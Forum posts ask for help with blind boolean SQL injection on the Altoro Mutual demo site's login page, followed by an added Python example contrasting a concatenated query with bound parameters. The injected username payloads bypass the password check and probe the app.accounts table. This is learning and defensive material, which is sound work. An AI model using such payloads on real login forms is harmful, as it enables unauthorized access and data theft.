Posts posted by gunitinug
Correction. It should be the APP.contacts table with user column.
-
Quote
ignore the last post
-
Correction. This logs in
admin' and (select count(user) from app.accounts where user not like '%')=0--
But not
admin' and (select count(user) from app.accounts where user not like '%')>0--
-
Hi.
I have to pen test the Altoro Mutual site (https://demo.testfire.net) for a project. The site uses DERBY DB.
I have discovered that its login page is vulnerable to blind boolean sqli.
I have discovered that there is a table called user under the schemaname of APP (i.e. APP.user).
I typed in
Username: admin' and (select count(user) from app.accounts where user like '%a%')>0--
Password: anything
This tests whether there is a user that contains the letter 'a'. If the test succeeds, the Altoro Mutual site logs in. Otherwise it says "Login Failed: We're sorry, but this username or password was not found in our system. Please try again."
I've tried the same test but this time iterated from a-zA-Z. But it never succeeds in logging in, which tells me that maybe the Username is not in the English alphabet. But this is unlikely.
So my problem is I don't know why the LIKE operator doesn't return the result that is expected.
I also tried
Username: admin' and (select count(user) from app.accounts where user not like '%a%')>0--
Password: anything
And this time every iteration of a-zA-Z logs in. So this result also tells me the Username does not contain a letter.
Lastly, this one works (it logs in)
Username: admin' and (select count(user) from app.accounts where user not like '%')>0--
Password: anything
Can you help me understand why the LIKE operator fails when user LIKE '%a%' and so on?
THX
Altoro Mutual site
in Security
Posted
Sorry, APP.accounts table with user column.
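
As an added example (not part of the posts above and not the site's code): a login query built by string concatenation, where the posted username values act as a true/false test, next to a bound-parameter version where the same input is only a non-matching username. It uses SQLite in place of Derby; the table contents and the function names are constructed assumptions.

```python
import sqlite3

# Username values quoted from the posts above.
LIKE_A = "admin' and (select count(user) from app.accounts where user like '%a%')>0--"
NOT_LIKE_GT0 = "admin' and (select count(user) from app.accounts where user not like '%')>0--"
NOT_LIKE_EQ0 = "admin' and (select count(user) from app.accounts where user not like '%')=0--"

def make_db():
    # Constructed stand-in for the login table (SQLite, not Derby).
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS app")  # gives us an "app" schema name
    db.execute("CREATE TABLE app.accounts (user TEXT, password TEXT)")
    db.execute("INSERT INTO app.accounts VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    # Vulnerable form: the input becomes part of the SQL text. A quote in the
    # username closes the string literal, and "--" comments out the password check.
    sql = ("SELECT count(*) FROM app.accounts WHERE user = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_bound(db, username, password):
    # Hardened form: placeholders keep the input as data, so the whole string
    # is compared against the user column and never parsed as SQL.
    sql = "SELECT count(*) FROM app.accounts WHERE user = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def compare(username, password="anything"):
    # Returns (result with concatenation, result with bound parameters).
    db = make_db()
    try:
        return login_concat(db, username, password), login_bound(db, username, password)
    finally:
        db.close()

if __name__ == "__main__":
    for name in (LIKE_A, NOT_LIKE_GT0, NOT_LIKE_EQ0):
        print(compare(name), name)
```

With bound parameters the login result no longer depends on the injected condition, so the page stops answering yes/no questions about the table.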